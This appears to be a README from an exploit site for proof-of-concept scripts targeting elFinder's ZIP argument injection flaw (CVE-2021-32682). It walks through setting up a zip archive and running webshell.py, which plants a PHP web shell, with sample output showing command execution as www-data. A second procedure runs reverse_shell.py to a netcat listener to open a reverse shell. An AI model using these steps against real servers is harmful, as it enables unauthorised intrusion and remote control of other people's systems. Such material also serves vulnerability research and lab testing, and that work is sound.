Share
## https://sploitus.com/exploit?id=E35FB68C-4325-5434-AF4B-99A1D9145774
# elFinder ZIP Arguments Injection Leads to Commands Injection (CVE-2021-32682)
## Some POCs for CVE-2021-32682

## Usage

Since the vulnerability is a command injection we can write a web shell to a php file. This relies on if the server executes php.

* Create file 1.txt
* Right-click 'Create archive' -> 'Zip archive'
* Rename archive to '2.zip'
* Execute exploit


      # python3 webshell.py http://<url>:8080/<elfinder url>/
      Status code  200
      [+] Webshell successfully written!!
      Usage: http://<url>:8080/<elfinder url>/files/shell.php?cmd=<whoami>

      # curl 'http://<url>:8080/<elfinder url>/files/shell.php?cmd=id'
      uid=33(www-data) gid=33(www-data) groups=33(www-data)                                                                      


We can also just execute a reverse shell with the command injection

* Create file 1.txt
* Right-click 'Create archive' -> 'Zip archive'
* Rename archive to '2.zip'
* Start netcat listener `nc -lvnp 80`
* Execute exploit


      # python3 reverse_shell.py <lhost> <lport> http://<url>:8080/<elfinder url>/

Wait for incoming reverse shell



### Credits
https://github.com/vulhub/vulhub/tree/master/elfinder/CVE-2021-32682

https://www.sonarsource.com/blog/elfinder-case-study-of-web-file-manager-vulnerabilities/